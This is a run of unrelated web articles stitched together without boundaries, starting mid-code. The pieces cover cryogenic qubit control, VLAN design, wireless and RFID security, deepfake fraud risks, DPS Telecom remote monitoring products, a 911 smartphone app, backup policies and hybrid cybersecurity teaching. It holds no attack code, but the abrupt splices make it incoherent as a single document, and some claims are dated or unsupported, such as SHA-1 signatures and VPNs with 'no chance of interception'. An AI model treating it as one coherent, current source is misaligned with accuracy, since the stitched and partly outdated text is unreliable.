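    return sorted((g for g in gaps if g[1] > 0), key=lambda g: -g[1])

for category, gap in prioritized_gaps(current, target):
    print(f"{category}: close a gap of {gap} maturity level(s)")
# Detection Processes comes first (gap of 3), so it gets resources first.
```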
Microsoft's Pioneering Quantum Hardware Allows for Controlling up to Thousands of Qubits at Cryogenic Temperatures

Quantum computing offers the promise of solutions to previously unsolvable problems, but in order to deliver on this promise, it will be necessary to preserve and manipulate information that is contained in the most delicate of resources: highly entangled quantum states. One thing that makes this so challenging is that quantum devices must be ensconced in an extreme environment in order to preserve quantum information, yet signals must be sent to each qubit in order to manipulate this information—requiring, in essence, an information superhighway into this extreme environment.

Microsoft's David Reilly, leading a team of Microsoft and University of Sydney researchers, has developed a novel approach to the latter problem. Rather than employing a rack of room-temperature electronics to generate voltage pulses to control qubits in a special-purpose refrigerator whose base temperature is 20 times colder than interstellar space, they invented a control chip, dubbed Gooseberry, that sits next to the quantum device and operates in the extreme conditions prevalent at the base of the fridge. They have also developed a first-of-its-kind, general-purpose cryo-compute core one step up the quantum stack, which operates at slightly warmer temperatures, comparable to that of interstellar space: around 2 Kelvin (K), achievable by immersion in liquid helium. Although this is still very cold, it is 20 times warmer than the temperatures at which Gooseberry operates, and therefore 400 times as much cooling power is available. This core performs the classical computations needed to determine the instructions that are sent to Gooseberry, which, in turn, feeds voltage pulses to the qubits. Together, these novel classical computing technologies solve the I/O nightmares associated with controlling thousands of qubits.

Microsoft Quantum researchers are playing the long game, using a holistic approach to aim for quantum computers at the larger scale needed for applications with real impact. Aiming for this bigger goal takes time, forethought, and a commitment to looking toward the future. In that context, the challenge of controlling large numbers of qubits looms large, even though quantum computing devices with thousands of qubits are still years in the future.
In this lesson we will take a look at VLANs (Virtual LANs): I will explain what they are and why we need them. First of all, let me show you a picture of a network:

Look at this picture for a minute. We have many departments, and every department has its own switch. Users are grouped physically together and are connected to their switch. What do you think of it? Does this look like a good network design? If you are unsure, let me ask you some questions to think about:

- What happens when a computer connected to the Research switch sends a broadcast like an ARP request?
- What happens when the Helpdesk switch fails?
- Will our users at the Human Resource switch have fast network connectivity?
- How can we implement security in this network?

Now let me explain to you why this is a bad network design. If any of our computers sends a broadcast, what will our switches do? They flood it! This means that a single broadcast frame will be flooded on this entire network. The same happens when a switch hasn't learned about a certain MAC address: the frame will be flooded.

If our Helpdesk switch were to fail, users from Human Resource would be "isolated" from the rest, unable to access other departments or the Internet; this applies to the other switches as well. Everyone has to go through the Helpdesk switch in order to reach the Internet, which means we are sharing bandwidth, probably not a very good idea performance-wise.

Last but not least, what about security? We could implement port-security and filter on MAC addresses, but that's not a very secure method since MAC addresses are very easy to spoof. VLANs are one way to solve our problems.

One more question I'd like to ask you to refresh your knowledge:

- How many broadcast domains do we have here?

What about broadcast domains? We didn't talk about this before, but I think you can answer it. If a computer on the Sales switch sends a broadcast frame, we know that all other switches will forward it. Did you spot the router at the top of the picture? What about it… do you think a router will forward a broadcast frame?
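Here is the key to that last question: routers do not forward broadcast frames, so every switch that can reach another switch without crossing the router shares one broadcast domain. The following Python sketch counts broadcast domains under that rule; the topology is my reading of the picture (each department switch uplinked to the Helpdesk switch, with the router above it), so treat the link list as an assumption.

```python
from collections import defaultdict

links = [
    ("Sales", "Helpdesk"), ("Research", "Helpdesk"),
    ("HumanResource", "Helpdesk"),
    ("Helpdesk", "Router"),  # the router marks the broadcast boundary
]

def broadcast_domains(links):
    adj = defaultdict(set)       # switch-to-switch adjacency only
    switches = set()
    for a, b in links:
        for device in (a, b):
            if device != "Router":
                switches.add(device)
        if "Router" not in (a, b):
            adj[a].add(b)
            adj[b].add(a)
    seen, domains = set(), 0     # count connected components via DFS
    for start in switches:
        if start in seen:
            continue
        domains += 1
        stack = [start]
        while stack:
            node = stack.pop()
            if node not in seen:
                seen.add(node)
                stack.extend(adj[node] - seen)
    return domains

print(broadcast_domains(links))  # -> 1: the whole switched LAN floods together
```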
The beauty of wireless communication is that it frees the user from the limited reach of wires or a dock. Mobile data systems pass information from mobile devices in remote locations to the enterprise data center via radio waves in "free space." This area in the middle, between the device and host, is where the information is transported or communicated, and this layer must be secured as well. As there are no physical boundaries to prevent intruders from intercepting data in free space, wireless communication security must protect the packets of data being transmitted, ensuring that only those for whom they are intended can read them. This is accomplished through "secure tunnels." Just as there are many ways to build physical tunnels, there is more than one way to create wireless tunnels. Here are the basic building blocks of creating a secure tunnel:

• User Authentication – Determining that the network users are who they claim to be. Authentication allows access to users based on certain credentials, and verifies that a third party has not altered data sent between two users.
• Encryption – Encoding data before it is transmitted and delivering it in a way that can be quickly deciphered by the authenticated receiver. Encryption allows sensitive information to traverse a public network without compromising confidentiality.
• Message Authentication – Proof that messages, encrypted or otherwise, have not been tampered with or replayed (sent multiple times to cause havoc) between the sender and receiver.
• Access Control – Blocking unwanted user access to an internal network or service. This restricts the user to the tools that are designated only for them. Access control is typically achieved through authentication.

When it comes to wireless security, one size certainly does not fit all. The type of security deployed for WLANs can be very different from that designed for other wireless technologies such as GPRS, Bluetooth and RFID. Companies securing wireless LANs are primarily concerned about data theft, such as potential intruders driving by the facility or sitting in the parking lot, trying to pick up the company's wireless signal and possibly gaining access to the network. "Man-in-the-middle" attacks — where a thief captures data packets and routes them to other servers for his own purposes — are another mode of data theft. Recommended means for securing a WLAN include WPA, WPA2, virtual private networks (VPNs), and security gateways or firewalls.

WPA (Wi-Fi Protected Access)

WPA is a powerful, standards-based, interoperable security technology for 802.11-based Wi-Fi networks. It provides strong data protection by using encryption as well as access controls and user authentication. WPA utilizes 128-bit encryption keys and dynamic session keys to ensure wireless network privacy and enterprise security.

WPA2 (Wi-Fi Protected Access 2)

WPA2 is the certified interoperable version of the full IEEE 802.11i specification, which was ratified in June 2004. WPA2 supports 802.1x/EAP authentication and includes AES, the Advanced Encryption Standard. It provides a very high level of assurance that only authorized users are accessing the WLAN network.

Virtual Private Networks (VPNs)

Most major corporations today use VPNs to protect remote-access workers and their connections. VPNs create a secure "tunnel" from the end-user's computer, through the end-user's access point or gateway, on through the Internet and all the way to the corporation's servers and systems.
VPNs also can be implemented within local area wireless networks to protect transmissions from WLAN-equipped computers to corporate servers and systems. Most corporate IT departments are already skilled with VPN technology and can modify existing systems to support WLAN networks. A VPN works through a designated VPN server at the company headquarters and creates an encryption scheme for data transferred to computers outside the corporate offices. VPN software on the remote computer uses the same encryption scheme, enabling the data to be safely transferred back and forth with no chance of interception. The wireless market currently is split between two distinct types of VPNs — IPSec (IP security) and SSL (Secure Sockets Layer) technologies.

Enterprises can further control access of mobile devices to various back-end resources, such as SAP, ERP databases and financial records, through gateway servers. Gateways can be configured to allow mobile devices to access only required services, while preventing access to the greater Internet. In addition, gateways can be configured to block specific mobile devices from network access if they are reported lost or stolen.

Network firewalls can make a network appear invisible to Internet traffic and can block unauthorized users from accessing files and systems. Hardware and software firewall systems monitor and control the flow of data in and out of computers in the wired and wireless enterprise, business and home networks. They can be set to intercept, analyze and stop a wide range of Internet intruders and hackers. Many levels of firewall technology are available, including software only or powerful hardware and software combinations. Some WLAN gateways and access points provide built-in firewall capability, but even if they don't, most WLAN gateways include a routing capability that acts like a basic firewall, making the networked computers and their data invisible to hacking scans and probes.

Wide Area Wireless Communication Security

Wide area wireless technologies such as CDMA, GSM, and GPRS act as bearers or pipelines for the information to be sent and received by the company network. As a safety precaution, companies should only allow network communication with wide area signals that are encrypted by SSL or IPSec. In addition, network access should only be granted to authenticated users. Internet protocol-based VPNs provide the tunneling and encryption required for business users to safely access their critical applications over wide area connections, using IPSec to ensure the privacy of data traveling over the public Internet. As businesses support more remote users, VPNs can be designed to support high network availability, ensuring that mission-critical data arrives on time. Additionally, IP-based VPNs can be deployed and integrated easily with existing network infrastructures, enabling enterprises to scale operations to meet the expanding demand for remote access.

Bluetooth Security

Since the technology's inception, strong security measures have been available for Bluetooth to ensure safe use. The Bluetooth specification provides methods to uniquely bond devices in one-to-one relationships, using PIN numbers to identify and verify a particular Bluetooth device. Once bonded, a Bluetooth device may be set to "undiscoverable" mode, thus preventing other Bluetooth devices from "seeing" it during the discovery process and accessing or sending data.
These capabilities — called pairing (discovery of another Bluetooth device) and bonding (sharing of a PIN key for authentication) — provide for Bluetooth device authentication. Bluetooth extends device authentication to protection of transmitted data through the optional use of a 128-bit encryption key. Educating users to deny requests to pair with a Bluetooth device if the requestor is unknown can eliminate many Bluetooth security breaches. This can become a non-issue by setting the Bluetooth terminal to "undiscoverable" once it is paired with the intended Bluetooth peripheral. From an industry perspective, transmission of highly sensitive data over a Bluetooth link — such as funds transfer transactions — is not recommended.

RFID Security Issues

Often, the data stored on an RFID tag is of a public, product-related nature, such as UPC/EPC codes or product descriptions. Generally these descriptions also are copied in human- and machine-readable format on printed barcodes. This kind of data requires low or no security. Companies using RFID technology in other, more security-sensitive environments must protect the data when it is in transit — from the RFID tag to the reader and from the reader to the network. To ensure confidentiality, data should be encrypted as it is written to the tag.

As an additional security measure, part of the data area on a tag may be used to store a cryptographic signature, such as an SHA-1 cryptographic hash, which verifies that the rest of the data reported has not been tampered with. Some or all of the reported data also may be encrypted. Data on RFID tags also can be "locked" to prevent anyone from changing or erasing it. RFID readers connect to the network in the same way as other network devices, and should be secured in the same manner. Whether the reader-to-network connection is wired or wireless, the precautions described in the device security section above should be implemented. Also, be aware that network access control security and financial transactions are better handled with smart cards and biometrics; both technologies are superior to RFID at thwarting remote eavesdropping and copying.
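To make the hash-signature scheme described above concrete, here is a minimal Python sketch. The tag layout and helper names are illustrative assumptions rather than part of any RFID standard, and because a plain digest can simply be recomputed by an attacker who rewrites the data, a modern design would prefer a keyed HMAC or a stronger hash such as SHA-256; the sketch only demonstrates tamper detection.

```python
import hashlib

def write_tag(payload: bytes) -> dict:
    """Return the record a writer would store on the tag: data plus signature."""
    return {"data": payload, "sig": hashlib.sha1(payload).hexdigest()}

def verify_tag(record: dict) -> bool:
    """Recompute the hash on read and compare it to the stored signature."""
    return hashlib.sha1(record["data"]).hexdigest() == record["sig"]

tag = write_tag(b"EPC:0123456789")
assert verify_tag(tag)           # an untouched tag verifies
tag["data"] = b"EPC:9999999999"  # simulated tampering with the data area
assert not verify_tag(tag)       # verification now fails
```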
The "fake news" label is often applied in response to a news story that presents information unfavorable to the subject of the story. Sometimes the news is true — sometimes it's fake. However, the over-usage of the term obscures the real danger posed by increasingly sophisticated deepfake videos.

Deepfakes leverage deep-learning technology, a branch of artificial intelligence (AI), and effectively learn what a person's face looks like at different angles in order to superimpose that likeness onto another person. The AI algorithms behind deepfakes can take in large amounts of data (photos of a person's face, voice samples, etc.) and, from it, create audio and video of a person doing or saying things they've never done. The technology can even go so far as to match physical mannerisms to audio and video, replicating an original speaker's lip and mouth movements.

Fake news and deepfakes aren't restricted to any one political party, country, or affiliation, either. The most widely read and distributed fake news story of 2016 was a post that claimed the Pope had endorsed Trump; later, an identical story was published claiming the Pope had endorsed Clinton.

Collectively, we may be suspicious of random postings on Facebook or Twitter, but a video of an event is more likely to be trusted. If we see and hear it, then we have "proof." For this reason, fake videos are more dangerous than fake news. Lately, there has been an escalation of selective editing, but often those clips can be "debunked" by sharing the unedited video. When deepfake technology is used to create a new video, larger problems arise. Unlike editing that cuts out a key part of an answer, if there is no video of the original event, then it might be hard to counter a deepfake. If it is convincing, it will be harder yet to prove it's not real. Additionally, in our current information consumption model, videos often get wider circulation, are more easily shared, and are more memorable. We have become cynical about the biases a media outlet may apply to a report, but we think that an unedited video is the only authority that we can trust — until now.

In the political world, many people will accept a deepfake video without question because it supports their point of view. But a different element of trust and suspicion exists in the business world. Even as hacking and phishing continue to get more sophisticated (and continue to work), AI used in combination with social hacking opens an entirely new Pandora's box. One of the first cases of financial fraud using deepfake technology involved AI-synthesized audio that recreated the voice of a company's general director. Using the fake audio, the attacker managed to convince an employee to transfer 220,000 euros to their bank account.

The number of possible exploits is limited only by the imagination of the nefarious actor. A sample of the more obvious includes:

- False claims of malfeasance, damaging a product or company's reputation
- Endorsements that are not real (you thought fake written reviews were harmful)
- Video-backed HR complaints about a co-worker or a boss
- Insurance fraud, supported by "video proof"
- False news about the company's owners, founders, leaders, etc.
- Onboarding processes subverted and fraudulent accounts created
- Identity theft, using video to convince someone to alter critical personal data
- Diversion of shipments
- Orders for unwanted materials
- Payments and/or funds transfers fraudulently authorized
- Blackmail based on the threat to release a damaging video

Some of these events don't have to be believed for very long to have a significant impact. In a deepfake extortion scenario, the authenticity of the defamatory video will be irrelevant; the potential damage will be just as significant to the individual and/or corporate reputation. This could be monetized by someone selling a stock short just before the bad news comes to light. It only takes a believable rumor to have real impacts on businesses and individuals, and recovering from a false story will take even longer if the casual observer cannot tell it is a hoax.

Detecting fake videos has been a challenge for quite some time. Rising Sun, both a book by Michael Crichton (1992) and a movie (1993), foreshadowed how a video can be faked. In this fictional story, a video was altered to frame someone for murder. One scene in particular showed how easy it had become to replace the face of one person with that of another — and this was over 25 years ago! Detecting fake videos now will not be as simple as close observation of a misplaced shadow, a shifted camera view, or a background lighting inconsistency. AI-backed machine learning techniques are being used to spot detectable problems and improve the quality of the deepfake.

Most cybersecurity experts are promoting AI technologies to detect irregularities in the operation of computer systems and networks. Similarly, AI is currently one of the best tools to fight deepfakes by trying to detect anomalies. But like many challenges in the world of security, it feels like we will usually be a step behind the black hats.

Should you be personally worried? Think of something that you would never say, and then imagine your friends, family, or employer being shown a (convincing) video of you saying it. The potential for malicious misuse is a problem for all companies and for all of us individually.

"SCTC Perspective" is written by members of the Society of Communications Technology Consultants, an international organization of independent information and communications technology professionals serving clients in all business sectors and government worldwide.
A remote monitoring tool is any hardware or software (or a combination) that helps you keep track of your remote resources. As networks grow, network resources are distributed across different locations to support the network, and, since there's a limited number of you, you need something to help you keep tabs on your network when you're not around. This is where remote monitoring tools come in.

Typically, remote monitoring tools exist in a hierarchy, from the sensors actually monitoring equipment at your sites to the master station, which consolidates all of the remote monitoring information to provide you with a total network view in a single interface. Lower-level remote monitoring components (discrete alarms, analog sensors, and control relays) are run through a remote telemetry unit (RTU), and the RTUs report to an alarm master. (In large, highly sophisticated networks, RTUs may be run through master stations to a "top-level" master. This introduction to remote monitoring tools will not explore a network with that level of sophistication.)

Monitoring your network hardware is typically done with a combination of discrete points and analog sensors, which raise "alarms" to indicate that something has gone wrong or moved outside a normal range. Discrete alarms issue a certain voltage when a condition has been met, providing a binary alert: on/off, open/closed, connected/disconnected reporting. Often, these points can be databased within an RTU or a master station with various levels of importance - critical, major, and minor - to help provide more sophisticated alarm reporting.

Analog sensors measure a range of current or voltage and interpret their readings against a reference, effectively measuring temperature, fuel level, pressure, and a number of other factors. Analogs typically monitor not your equipment itself - most equipment won't report how well it's working - but the environment and other factors related to your equipment that are equally important. For example, if the temperature at a remote site rises above the set temperature for your HVAC equipment, you know that your air conditioning systems aren't working properly. (And, obviously, if the temperature rises too high, you'll likely face equipment failure.)

Both types of inputs are found on remote telemetry units (RTUs), a standard remote monitoring tool that essentially acts as your eyes, ears, and, in some cases, hands onsite. RTUs usually sit inline with other rack-mounted equipment, monitoring the above types of inputs, collecting the data, and notifying you when an alarm condition occurs. Sophisticated RTUs, like the NetGuardian series from DPS Telecom, can monitor up to 64 discrete inputs and up to 8 analog inputs per unit, with expansions available to increase capacity, so you can monitor even your largest remote sites. They also deliver alarm notifications in a number of convenient ways - email, text, pager, and, with an accessory, voice - so you aren't stuck watching a terminal full of scrolling text to keep track of your sites; you can keep a close watch on things from your smartphone or laptop.

For added benefit, some of the better RTUs out there also offer control relays: simple circuits that perform a function upon closing (or, in some cases, opening) the circuit. Control relays provide a small measure of control at remote sites, saving you an otherwise unnecessary trip just to flip on a generator or turn on air conditioning equipment. The NetGuardian series also allows you to derive controls from your discrete or analog alarms, so when an alarm value occurs that can be easily rectified by operating a control, the RTU will take care of it without bothering you about the situation.
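To make that derived-control behavior concrete, here is a minimal Python sketch. The threshold, names, and notification text are illustrative assumptions, not NetGuardian firmware logic; the point is simply that the RTU can act on an analog alarm itself and escalate to a human only when acting is not enough.

```python
SITE_TEMP_MAJOR_F = 85.0  # assumed high-temperature threshold for the HVAC example

def evaluate(temp_f, hvac_relay_closed):
    """Return (relay_should_close, notification_or_None) for one polling cycle."""
    if temp_f < SITE_TEMP_MAJOR_F:
        return False, None                     # normal range: nothing to do
    if not hvac_relay_closed:
        return True, None                      # close the relay, run HVAC, no page yet
    return True, "MAJOR: temp still high with HVAC running"  # escalate to a human

print(evaluate(78.0, False))  # -> (False, None)
print(evaluate(90.0, False))  # -> (True, None): the RTU handles it on its own
print(evaluate(92.0, True))   # -> (True, 'MAJOR: ...'): now notify staff
```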
RTUs can also be ordered with a number of additional features to suit your monitoring needs. DPS Telecom's NetGuardian series can often be ordered with terminal server ports, allowing access to your serial-only devices over LAN and preventing trips to sites just to access equipment. Some can be ordered with a 10/100BaseT switch, so you can extend LAN access at a site without setting up additional equipment. Remember, your remote monitoring tools exist to keep you away from the sites, so you can keep your network running optimally and spend less time traveling; when you look at RTUs, it would be wise to consider these and other features that can help you do that.

As a remote monitoring tool, the RTU will also offer some form of interface you can access remotely. In some cases this is a simple terminal interface, operated with a series of commands that you'll have to remember in order to access your remote monitoring data. In the case of DPS Telecom's NetGuardians, it's a fully featured web-browser interface: you can simply open a web browser and punch in the IP address of the RTU to see alarms at your sites or database your alarm points. It's important that the information from your remote monitoring tools is easily accessible and interpretable.

As your network grows, it becomes increasingly necessary to consolidate the information your RTUs feed you into a single interface, so when you receive an alarm notification, you don't waste time or energy trying to remember which point is associated with which IP address at which site just to investigate the alarm. An alarm master station is a remote monitoring tool that does just this: it aggregates all your alarm data and displays everything on a single interface. Your prime criterion for selecting an alarm master should be that it consolidates information from all of your equipment, regardless of protocol. Whether you have equipment working in legacy, proprietary, or any variety of protocols, your alarm master station needs to be able to capture everything, so you don't have to go outside the interface to see your alarms. Beyond that, the top-level remote monitoring tool must be both accessible and easily navigable, so you can keep in touch with your master from wherever you are and don't have to fumble through a clumsy interface when you need to access it.

T/Mon, DPS Telecom's alarm master station, fulfills both criteria handily. T/Mon provides three different interfaces, each designed to fulfill a specific monitoring need and each accessible remotely or locally. It has a standard terminal interface designed for maximum usability: responsive and extremely powerful, built for the power user who will database alarm points and monitor the unit. It also offers a web 2.0 interface that allows quick access to alarm statuses, so you can check your alarm database while on the go. But the real draw is the new T/GFX map-based graphical interface.
T/GFX allows you to distribute your alarms on a map, so when any of your remote monitoring tools indicates a problem, you can see exactly where it has occurred geographically; you no longer have to waste time associating IP addresses with physical locations. It also allows you to "drill down" to lower map levels, all the way to a view of your equipment. If you have terminal servers or LAN-accessible equipment at your sites, you can also associate that equipment with an icon within T/GFX and open its interface from within the graphical interface, so you can truly control your whole network from the master interface.

As your network grows, you can't afford to simply react when something goes wrong at your sites, and you certainly don't want to make trips to sites to fix trivial problems when you have real network issues. The right set of remote monitoring tools will make network maintenance more proactive and help you prevent equipment failures and network outages by responding intelligently to the problems that arise in your network.
The 911 emergency phone system is outdated.

In 1876, Alexander Graham Bell invented the telephone, allowing speech to be transmitted electronically over wires. His invention swept the world, and homes and businesses everywhere installed telephones to communicate. If you wanted to speak to someone, you called their home or business and asked to speak to them. When the 911 emergency call system was invented in 1968, most homes had fixed-location, landline telephones. Using caller ID and a database of home addresses, it was easy and automatic for the 911 dispatcher to get the physical address of the caller.

Times have changed. People are permanently disconnecting their home landline phones at an astonishing rate. The old telephony model of calling a place has been replaced by calling a specific person, wherever they are at the moment, on their mobile phone.

POTS goes up in smoke

Mobile phones are everywhere and landlines are dying. Plain Old Telephone Service (POTS) is not only being disconnected by consumers - even phone companies like AT&T want to cut the cord. Fewer than 10 percent of the households in AT&T's territory in Illinois have old-fashioned landlines. AT&T has petitioned the FCC to allow it to disconnect the 1.2 million landline phone customers it serves in the state, to help it move toward modern wireless telephony and Internet services. Phone companies wanting to exit the landline business is a growing national trend; AT&T has gotten similar legislation passed in 19 other states as well.

The FCC estimates that over 70 percent of calls to 911 are from cell phones, and that number is rising quickly. Mobile phones don't have a fixed location; they move about. This simple fact causes a major problem for the 911 system: caller ID can no longer automatically provide the location of the caller to the 911 operator. Knowing the location of a cell tower is not the same as knowing the location of a person in trouble. To respond to an emergency, the police, fire or medics must know the physical address to go to. No address, no response. It has therefore become necessary for the 911 dispatcher to question the caller to identify their location. This is by no means as easy as the old days, when the landline phone did not move and its location was perfectly known. While a dispatcher will ask location questions, the person calling from a mobile phone may not even know where they are at the moment. They may be driving down a dark highway and see an accident, or see a house on fire and not know even what town they are in.

The Solution: 911 must embrace smartphone technology

A multi-billion-dollar, long-term buildout is planned to modernize the 911 system. However, we should not need to wait! ELERTS mobile apps already can provide the location of the caller when a person presses the 'Call 911' button in the app. Smartphones have excellent GPS location information, which can be transmitted by mobile apps. Knowing the location of an emergency is critical for responding and rendering police, fire or medical services to those in peril. Providing an easy way for citizens to contact emergency operators is crucial for public safety. We must adapt our emergency services to better interact with the mobile-phone-using public. The more eyes and ears reporting safety and security concerns, the better.

So, while we have to wait for that multi-billion-dollar 911 infrastructure upgrade to come to fruition, we do have alternatives that work today. The next time you hear of a See Something Say Something app in your area, download it and help by being a part of creating a safer society.
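As a minimal illustration of that idea, the Python sketch below shows how an app could package a GPS fix with a report so the dispatcher receives a usable location automatically. The field names and coordinates are hypothetical; this is not the actual ELERTS or 911 data format.

```python
import json
import time

def build_report(lat, lon, accuracy_m, text):
    """Package one citizen report with the phone's GPS fix attached."""
    return json.dumps({
        "type": "citizen_report",
        "timestamp": int(time.time()),
        "location": {"lat": lat, "lon": lon, "accuracy_m": accuracy_m},
        "message": text,
    })

print(build_report(37.7793, -122.4193, 8.0, "Accident on the highway shoulder"))
```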
A backup process is also known as a backup procedure and policy. It gives organizations a repeatable strategy for protecting their data over the long term. If you want to strengthen your organization's process, you are in the right place. Here is everything you need to know to create a backup process that will protect the organization from data loss.

Backup Process Definition

A backup process, or procedure, is a strategy for ensuring that backups are recoverable and protected. It also minimizes downtime and helps prevent data loss from happening in the first place. After all, uptime and recovery are the most critical aspects. All companies must create and follow a backup process. It allows them to secure everything important and get the most out of their data storage and backup systems.

Top Tips To Create An Effective Backup Process

If you are looking to create the most effective backup process for your organization, here are the top tips to implement:

- Create Consistent Policies

Your backup process must have consistent policies across all devices and servers where your backups are stored. If your backups are spread across various devices, you need consistent policies to keep them all safe. Therefore, team members should sit down and consult with one another to create the best policies. Doing this ensures that everyone understands the rules and that they are consistent across all departments and processes.

- Clear Policies And Easy Implementation

Your backup process policies must be clear and easy to implement, because everyone must understand each policy and its reason for existing. Backups contain important data, which is why the entire staff must recognize their importance. Data backup processes must not sit on the shelf; organizations need to update them consistently and review them from time to time with the staff, so that everyone understands the process.

- Create Metrics

Finally, you must create metrics for your backup process, because you need to review and check whether everyone is following the policies you created. Various backup tools with automatic policy-management features can help in this regard. You must also test your backup processes and recovery plans (see the sketch at the end of this post); once you do, you can follow the process you set with confidence if data loss occurs.

That was your complete guide to understanding backup processes. They are critical for all organizations that create large volumes of data and need a proper solution for backup and storage. The process policies must be clear and easy to implement, with a review process that allows you to test and refine them. So, follow these guidelines and create the best backup process for your organization.
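As a concrete example of the metrics tip above, here is a minimal Python sketch. The backup-set names, timestamps, and 24-hour policy are assumptions for illustration rather than features of any particular backup product; the idea is simply to flag any backup set whose last successful run violates the policy.

```python
from datetime import datetime, timedelta

POLICY_MAX_AGE = timedelta(hours=24)  # assumed "daily backup" policy

last_success = {                      # would come from the backup tool's logs
    "file-server": datetime(2022, 9, 25, 2, 0),
    "mail-server": datetime(2022, 9, 23, 2, 0),
}

def stale_backups(now):
    """Names of backup sets whose last success is older than the policy allows."""
    return [name for name, ts in last_success.items()
            if now - ts > POLICY_MAX_AGE]

print(stale_backups(datetime(2022, 9, 25, 12, 0)))  # -> ['mail-server']
```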
Cybersecurity education faces the need to adapt quickly to a hybrid learning model. The demand for expert cybersecurity professionals is expected to increase by over 350% this year alone, with even bigger increases possible next year. Without hybrid learning, it will be nearly impossible to train enough professionals to meet this demand. In this article, we will dive into hybrid learning and the technologies and practices that make it work, so you can empower your students to rise to the top of the cybersecurity field.

Hybrid learning is an educational approach in which some teaching occurs in a traditional classroom setting, while other information is provided online. Students may access some or most of the content remotely, and can typically take part in discussions during live lectures even if they can't be physically present. According to Penn State University, this approach reduces the time students must spend in a physical classroom by shifting most of the content delivery to an online learning environment. This makes hybrid learning efficient for cybersecurity students who need more than you can provide in the confines of a lecture.

Is There One Standard Hybrid Learning Model?

Many people assume that hybrid learning only exists to give some students the option to learn at home. Although this is one type of hybrid approach, it is only one of many. The Online Learning Consortium breaks down computer-aided learning programs into five primary categories:

- Classroom-based programs: These programs mirror a traditional learning environment with scheduled, in-person classroom sessions. Classroom hours can be used for lectures, lab activities, workshops, field trips, and other educational activities. Computer-based and online learning tools can supplement face-to-face instruction during classroom sessions.
- Synchronous distributed programs: These programs enable both in-classroom and remote students to participate in the same learning activities at the same time. This gives students who cannot physically attend classroom sessions the ability to learn in real time via a web conferencing tool. Remote students must still be available at scheduled class times to interact, but recordings can help students catch up if they miss a session.
- Web-enhanced programs: This type of course typically requires students to engage with some of the learning materials online as well as in the classroom. Online content usually makes up 20% or less of the total material.
- Blended hybrid classroom programs: These programs feature online learning activity designed to replace some face-to-face classroom sessions - but not all. For example, a classroom-based program that requires three days a week of in-class time might only involve one classroom session a week in a blended hybrid program.
- Blended hybrid online programs: Most of the learning and course work in these programs happens online. These programs typically require limited face-to-face activities, such as labs or workshops. These activities separate blended online courses from true "online programs" because students cannot be location-independent.

What are the Benefits of Hybrid Learning?

As hybrid teaching models and technology evolve, the benefits of hybrid learning programs are becoming clearer:
- Hybrid environments promote active learning. Very few students enjoy the thought of taking a course made up of nothing but classroom lectures. Even if the material is interesting, the one-way delivery of lecture-based teaching leaves many people unengaged, and low engagement means low retention. Active learning, though, immerses students in the learning experience by engaging them in meaningful discussions and activities. This allows students to remember information better, and to apply what they've learned in a wide range of scenarios. Group web conference discussions, online surveys, live Q&As, and other online activities provide active learning opportunities. Students can learn more, and synthesize information better, than they ever could from a lecture alone.
- Students can learn critical information to enhance their skills and knowledge without disrupting their daily lives. Current and future cybersecurity professionals need to stay on top of the latest information in order to excel in their careers. Still, students may be working at a job, taking care of children, and handling dozens of non-educational tasks every day. Hybrid learning lets them manage their lives without falling behind.
- Hybrid cybersecurity training programs can meet the increased demand. As a cybersecurity trainer, professor, or course facilitator, you should be looking for ways to help the increasing number of people entering the cybersecurity field. Hybrid training gives students the advantage of learning in the classroom as well as through practical applications and exercises in an online environment.

How Can You Create an Effective Hybrid Learning Environment?

Just as not all hybrid learning programs follow the same format, not all programs are equally effective. A poorly constructed hybrid learning program can leave students feeling confused and unprepared for the challenges of the working world. An effective hybrid environment, though, can amplify retention, synthesis, and use of the content to solve everyday cybersecurity challenges. Here are some ways you can create a hybrid program that is as effective as possible for your students:

- Determine goals for the hybrid program. You'll want to carefully outline your goals for yourself and your students throughout the class, so that everyone knows what is expected. Break down large goals into smaller goals that each correspond with an assignment, working backwards to ensure that the curriculum supports your overall aim.
- Map your students' journey. Once you have determined the overall goals and broken them down into assignments, you'll need to create a way to chart that journey for each student. You can use charts, graphs, lists, or other media to outline each lesson module, along with corresponding online media, outside reading, or other assignments. Putting your program content into a visual format can help you identify issues with consistency, flow, and content completeness.
- Identify the goals and sub-goals that require in-person meeting time. Chances are, most of the material will translate well to an online environment, where students can absorb and interact with the content remotely. Sometimes, though, certain lessons and activities should be done in person. Some examples include:
  - Outlining course or program expectations and assigning individual responsibilities
  - Live group brainstorming sessions
  - Creating a trust-based learning environment
  - Presentations and activities involving immediate feedback
- Identify the goals and sub-goals that can be achieved through online learning. After you have identified the goals and activities that require in-person classroom time, you'll need to ensure that the rest of the learning content is available online. There are many types of learning resources you can effectively deliver in an online environment:
  - Self-directed assessments and activities
  - Self-paced learning modules
  - Asynchronous class discussions, which can happen online over the course of days or weeks
  - Long-form written assignments, such as critical analysis responses to real-world example problems
  - Instructional video content
  - Livestream video content
  - Audio recordings
- Create and set up your program content. After you've matched your goals to in-person and online activities, you'll need to create the content that you'll distribute through these channels. As you prepare, be sure to look through your own archives, or those of your educational institution, for existing content. You may discover content you can repurpose or adapt to classroom or online learning, which saves time and lets you implement your program sooner. Also, look to group discussions for inspiration - in these conversations, you'll likely find questions, comments, and insights that spark a better understanding of what your students need. Once you've created the content, be sure to review it for consistency and logical flow.
- Do a "beta test" the first time. In a perfect world, the online portion of your program would work flawlessly the very first time your students see it. Unfortunately, this is rarely the case. Even the most carefully designed programs come with latent flaws, and it will take some time to correct errors as you discover them. Running a "beta test" with a handful of students or colleagues can help relieve the stress of publishing the online portion of your hybrid learning program. This arrangement benefits everyone - beta users get early access to valuable materials, and you get real-time, honest feedback to increase the quality and effectiveness of your hybrid learning program.
- Take advantage of technology to enhance hybrid learning. In the early days of the Internet, the idea of blending in-classroom instruction with online learning seemed like a promising but cumbersome task. Technology limitations made it difficult to implement hybrid programs with any significant degree of success. Today, though, there is a wide range of tech tools available to help make your hybrid program run seamlessly. Here are just a few:
  - Plug-and-play webcams - although you might have a built-in webcam on your laptop, the low resolution and overall poor quality of most built-in webcams make them substandard choices for online learning. A simple USB webcam can open up a new world of clarity and visual control. Better resolution isn't the only benefit of choosing an external webcam - a bigger lens means better clarity, particularly when lighting isn't perfect. Some webcams also come with tilt, pan, zoom, and other features that can enhance your presentations. TechLearning lists the highest-rated webcams for educators and students.
  - Video conferencing software - if you want your students to be engaged in the online part of your hybrid learning program, you'll want to be able to interact with them through online video conferencing. This type of software also makes it possible for students to attend live lectures remotely. There are many video conferencing software providers, each with unique features, benefits, limitations, and price points. Most are available on a subscription basis, with "pro level" pricing tiers that give users advanced features, such as cloud storage and livestreaming. Techradar reviews the top platforms based on these factors.
